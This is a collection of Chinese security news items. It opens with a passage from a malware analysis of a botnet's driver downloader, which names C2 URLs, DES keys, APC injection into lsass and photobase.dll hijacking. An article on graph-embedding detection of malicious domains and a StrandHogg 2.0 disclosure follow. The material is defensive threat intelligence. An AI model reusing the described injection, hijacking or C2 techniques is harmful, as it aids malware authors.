通信合作来完成作务的工作模式,这是一个驱动级别的下载器。所有敏感的配置信息都保存在驱动内部,DLL 通过调用驱动来获得配置服务器相关信息,根据下载的配置信息去百度贴吧下载其它恶意代码,进行下一阶段的恶意活动。 驱动运行后用APC注入法向系统进程 Lassas.exe 注入 DLL 模块。 DLL 配合驱动的执行过程。 DLL 首先尝试创建互斥对象 {12F7BB4C-9886-4EC2-B831-FE762D4745DC} ,防止系统创建多个实例。 接着会检查宿住进程是否是 Lsass.exe 或 svchost.exe,确保不是运行在沙箱之类的分析环境中。 尝试创建设备 "\\.\F46EA07E79033620CE13D35DE19AAC42" 句柄,建立和驱动模块的通信。 向驱动发送 0x222084 设备控制码,获得连接服务器的配置信息。和配置服务器的通信使用 HTTPS+DES 的双重加密方式,配置信息包含三个重要的部分: 主机信息上报服务 https://cs.wconf5.com:12709/report.ashx,供 DLL 上报主机基本信息。 bot id,安装时间等基本信息。 是否安装 360 杀毒,是否是虚拟机环境。 是否是无盘工作站。 上报主机信息使用DES加密,密钥为 HQDCKEY1。 访问 https://cs.wconf5.com:12710/123.html 下载配置信息: 配置信息依然是变形 DES 加密,解密密钥为 HQDCKEY1。解密后可以看到配置信息使用自定义的格式,两个百度图片为一组,截取有效数据拼接为一个有效文件: 配置信息 https://share.weiyun.com/5dSpU6a 功能未知: 所有驱动样本返回的配置信息都包含一个腾讯微云地址,直接访问该地址可以看到若干字符和数字组成的无意义字串。我们在收集到的配置信息中发现,每组数据中的配置信息服务器和微云保存的数据存在特定的模式。以上图为例,访问腾讯微云,获取字符串 cs127,其同组数据中的配置文件服务器的子域为 cs.xxxx.com ,端口为127xx。这看起来像是一种动态生成配置文件服务器地址的策略,推测可能是还在开发阶段的功能,所以样本中并未包含对应代码。 完成上述初始化过程后,驱动开始根据配置文件进入真正的功能操作。根据解析的配置文件,dll和驱动模块配合可以完成非常复杂的功能,下面罗列其中一部分功能。 更新驱动文件 程序会使用另一套算法得到DES解密密钥 HelloKey,最后用 DES 算法解出最终数据: 劫持进程ip地址。 向系统中添加证书 下载文件到 TEMP 目录并创建进程。 篡改 DNS配置 PAC 代理劫持 感染方式2 — DLL 劫持 感染方式 2 依然是以私服客户端为载体,但是在技术细节上有较大差异。 登录器下载页面: 下载后的登录器: 多款类似游戏的私服客户端的组件 photobase.dll 被替换成同名的恶意 DLL 文件,恶意 DLL 文件的 PE  Resource 中包含 3 个关键文件: 恶意 photobase.dll 有两个关键动作: 首先会释放相应架构的恶意驱动程序,然后注册系统服务并启动; 然后加载真正的 photobase.dll 文件,并将导出函数转发到真正的 photobase.dll。 后续感染流程同上。 这是一套标准的 DLL 劫持加载方式。 阶段1 — 释放并加载恶意驱动 恶意 photobase.dll 文件会首先为即将释放的恶意驱动文件生成一个随机文件名,文件名为 10 个随机字符,文件后缀为 .dat,并把自身 PE Resource 中相应的驱动文件放到 %windir%\Temp\ 目录下。 然后为落地的恶意驱动文件注册系统服务,并启动服务: 恶意驱动接下来的活动与前面第一种感染方式雷同,即下载、解密并最终加载其他恶意文件。 阶段2 — 加载真 photobase.dll 在恶意 photobase.dll PE Resource 中的真 photobase.dll 文件的前 2 个字节被置空: 恶意 photobase.dll 从 PE Resource 中提取这份文件的时候,会把这前 2 个字节以 MZ(PE 文件头) 填充: 然后,恶意的 photobase.dll 文件会为刚载入的真正的 photobase.dll 文件载入动态链接库、导入相关函数,最后,把真 photobase.dll 中的导出函数转发到自己的导出函数中。部分转发的导出函数如下: 以上面高亮的导出函数 Sqm::AddToStream() 为例,恶意 photobase.dll 中的转发实现如下: 相关安全团队声明 基于海量威胁情报,百度安全反黑产开放平台配合测算出僵尸网络的规模。平台同时启动相关措施,尝试对受僵尸网络控制的用户进行风险提示。在本次联合行动中,通过黑产威胁情报分析、共享、应对等举措,我们对于双枪团伙的作案技术手段、逻辑及规则形成进一步认知。 相关附录:https://www.cnbeta.com/articles/tech/983871.htm     (稿源:solidot,封面源自网络。)

基于域名图谱嵌入的恶意域名挖掘

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/LeK6QYHwd3k3UlyAuSkcZA   一、导语 恶意域名的挖掘检测一直是威胁情报生产的核心内容。在庞大的互联网体量下,以域名为节点的访问、下载、解析等关系够成了一张无比庞大的“图”,黑客的每一次访问、请求或下载,都构成了其中具有独特结构的可疑子图,由此出发,图关系天然适用于挖掘恶意域名。本文主要讲解了图嵌入(GraphEmbedding)相关技术在腾讯安全威胁情报生产中的运用。 二、应用背景 一般的恶意域名检测(Malicious Domains Detection)[1]任务是基于特征工程和机器学习来进行恶意域名的判定,但从网络图谱的角度上来看,域名是整个图中的一个节点,它在网络图谱中,与不同的节点,如IP、md5等有不同的相邻关系,如访问、下载、解析等。如下图是腾讯安图对域名节点的网络关系展示。 对于恶意域名而言,基于其网络图谱关系,能够有效获取实锤线索。而图嵌入技术让网络关系能够进行有效的数值化表达。 三、相关技术 图嵌入往往作为一些图神经网络(GraphNeural Networks,GNN[2])的输入特征,与词嵌入[3]类似,图嵌入基本理念是基于(非)相邻节点关系,将目的节点映射为稠密向量,这样就将图谱上的多边关系和实物节点进行了数值化,以便在下游任务中进行运用[4]。 在获取相应图嵌入后,围绕图嵌入的下游任务主要有四类:节点分类、链路预测、聚类分析和可视化分析。节点分类指对节点的类型进行分类,如判定域名节点是否为恶意;链路预测是为了判定两个节点之间是否有边相连;聚类分析是在无监督学习场景下的节点簇分析;可视化分析通常会对节点进行降维并可视化。 此外,需要注意的是,网络有同构(homogeneous networks)与异构(heterogeneous networks)之分,如用户作为节点构成的社交网络是同构网络,而如网络图谱这样,节点包括域名、IP等多种类型的是异构网络[5]。 基于同构网络进行图嵌入的代表是node2vec[6]。它的嵌入过程主要分两步:二阶随机游走(2ndorder random walk)获得节点序列和基于Skip-gram[3]训练节点嵌入。在二阶随机游走中,算法通过p、q两个超参数来控制游走到不同类型图节点的概率,如下图: 是未归一化概率,其取值由超参数p、q确定,其中代表了出发节点v的下一步节点x跟上一个节点t的三种相邻关系:相邻、不相邻和自身,如下图: 不同的p、q值,实现了对图节点两种相似性的偏好控制:同构性(homophily)和结构对等性(structural equivalence)。通过p、q的值,控制Breadth-first Sampling和Depth-first Sampling,进而将同构性和结构对等性采样到节点序列中。 此后,使用skip-gram对游走的序列结果进行训练,得到关于每个节点的稠密向量。 四、基于图嵌入的恶意域名挖掘 4.1 基于图嵌入的域名情报挖掘架构 腾讯安全威胁情报中心基于海量安全大数据,在知识图谱、图计算等方面有深入的研究。在图神经网络的应用方面,实现了基于多种类型图结构的域名节点的嵌入与判定。 下图是目前在域名情报图嵌入构建的主要架构。首先根据域名与其他实体的关联关系,构建域名的同构关系图,然后基于图嵌入技术训练域名的图嵌入表示,最后根据具体的需求,结合其他维度的数据,实现相应任务。 下面对其中基于样本下载关系的同构域名图嵌入实现进行详述。 4.2 基于样本下载关系的同构域名图嵌入实现 域名图嵌入的其中一部分是从md5与域名的下载关系出发,来构建同构域名图,如下图。其主要构建过程包括: 抽取种子域名 黑白样本md5采样 获取下载边关系 关联域名 构建域名带权无向图 node2vec训练 特征融合与建模 4.2.1 抽取种子域名 为了构建域名下载关系同构图,需要一批种子域名,这批种子域名用以关联下载相同黑白样本md5的其他域名,以构成一张关于域名同构的图。 目前,种子域名主要由域名情报和高危域名组成,记为domains_seed。 4.2.2 黑白样本md5采样 腾讯安全多年黑灰产对抗过程中累积了海量样本的相关信息,包括样本本身的黑白灰属性,为了构建域名下载关系网络,对活跃期内的样本md5进行采样,去除低广和高广的白样本和低广的黑样本。这样可以避免低广高广样本将域名网络连接成一个完全图,让不同类型域名在图上的结构具有更大的差异性,同时,降低同构网络构建过程中的内存压力,这个黑白md5集合分别记为md5_black和md5_white。 4.2.3 获取下载边关系 选取一定时间段内的从域名下载样本md5的关系数据(md5-downloaded-domain),这个数据表明了,在一定时间段内,某md5从哪些域名上下载。同时,移除md5不在md5_black和md5_white中的对应关系数据。 4.2.4 关联域名 种子域名分别与黑白样本md5关联非种子域名。 以黑样本md5为例。在md5-downloaded-domain中抽取域名在domains_seed中,而md5在md5_black中的的md5和域名的下载关系数据,记为md5 -domain-black。从md5 -domain-black获得对应的所有域名作为黑关联域名,记为domain_black_corr。 同理可得domain_white_corr。 4.2.5 构建域名带权无向图 在获得的黑白关联域名和种子域名上,通过md5-downloaded-domain构建带权无向同构域名黑白网络。 以黑关联域名为例。在md5-downloaded-domain上抽取域名为黑关联域名或种子域名、md5为黑的域名md5下载关系,并假定下载相同md5的域名是互连的,这样去掉md5,就得到了仅域名连接的多个无向边。 假设这些无向边的权重为一个基本权重单位,则假定边无向的前提下,相同边的数量作为这条边的权重。由此构建起关于黑md5的域名同构带权无向图。同理可得关于白md5的域名同构带权无向图。 4.2.6  node2vec训练 这里选取node2vec对构建的黑白带权无向图进行域名图嵌入进行训练,node2vec在节点分类上具有明显优势,适用于下游域名相关挖掘任务,如下图。 node2vec在多种评测数据上均获得了最优或近似最优的结果。 通过node2vec,分别训练获得了关于域名下载关系的黑白图嵌入。下图是通过t-SNE降维后,黑白两类域名图嵌入的散点图示。 4.2.7 特征融合与建模 在获得关于域名下载关系的黑白图嵌入后,针对具体下游任务,可以结合域名其他维度特征进行进一步分析。 在恶意域名检测任务中,结合了域名的多种嵌入和其他属性特征,构建前馈神经网络(feedforwardneural network,FNN)进行建模和域名检测。通过对图嵌入的运用,在召回相近的情况下,恶意域名检测的精确率(precise)提升了1.7个百分点,达到了93.1%。 五、总结与展望 基于图嵌入的恶意域名挖掘从域名网络关联的角度,为域名的检测提供了新的线索及其数值化方案,丰富了域名的特征的维度和检测精度。 目前,域名的各种图嵌入的构建主要基于同构网络,接下来,会继续研究异构网络在域名检测上的应用。此外,除了域名,图嵌入技术和图神经网络在IP等情报上,同样具有应用和探索的价值。 六、参考文献 [1] Zhauniarovich Y,Khalil I, Yu T, et al. A survey on malicious domains detection through DNS dataanalysis[J]. ACM Computing Surveys (CSUR), 2018, 51(4): 1-36. [2] Scarselli F,Gori M, Tsoi A C, et al. The graph neural network model[J]. IEEE Transactionson Neural Networks, 2008, 20(1): 61-80. [3] Mikolov T, ChenK, Corrado G, et al. Efficient estimation of word representations in vectorspace[J]. arXiv preprint arXiv:1301.3781, 2013. [4] Goyal P, FerraraE. Graph embedding techniques, applications, and performance: A survey[J].Knowledge-Based Systems, 2018, 151: 78-94. [5] Zhang F, Liu X, Tang J, et al. Oag: Towardlinking large-scale heterogeneous entity graphs[C]//Proceedings of the 25th ACMSIGKDD International Conference on Knowledge Discovery & Data Mining. 2019:2585-2595. [6] Grover A,Leskovec J. node2vec: Scalable feature learning for networks[C]//Proceedings ofthe 22nd ACM SIGKDD international conference on Knowledge discovery and datamining. 2016: 855-864.  

研究人员在 Android 9.0 等低版本系统中检出 StrandHogg 2.0 漏洞

Promon 研究人员刚刚曝光了一个影响 Android 9.0 等低版本系统的 StrandHogg 2.0 特权提升漏洞,若被黑客利用,用户的所有应用程序都将被其所染指。Promon 向 Google 通报了 CVE-2020-0096 安全漏洞,这家搜索巨头已降至标记为“严重”。庆幸的是,该漏洞尚未在野外被广泛利用。不过在今日披露之后,数以千万计的 Android 设备用户将变得更易受到攻击。 Promon 公告指出,该漏洞允许恶意应用在完全隐藏自身的情况下,获得假设合法的身份。 一旦将恶意应用安装在设备上,便可染指用户个人数据,比如短信、照片、登陆凭证、追踪 GPS 运动轨迹、通话记录、以及通过摄像头和麦克风监听用户。 Promon 表示,谷歌已于 2019 年 12 月 4 日收到漏洞披露通告,意味着搜索巨头在漏洞向公众曝光前有五个月的时间对其进行修补。 在面向 Android 生态合作伙伴的 2020 年 4 月安全补丁中,已经包含了 CVE-2020-0096 的漏洞修复(涵盖 Android 8.0 / 8.1 / 9.0)。 视频连接:https://www.cnbeta.com/articles/tech/983745.htm 需要注意的是,StrandHogg 2.0 较初代漏洞更加复杂,使之难以被反病毒和安全扫描程序检测到。 终端用户需注意不要从来历不明的非可信任来源安装 Android 应用,以免受到此类恶意攻击的影响。     (稿源:cnBeta,封面源自网络。)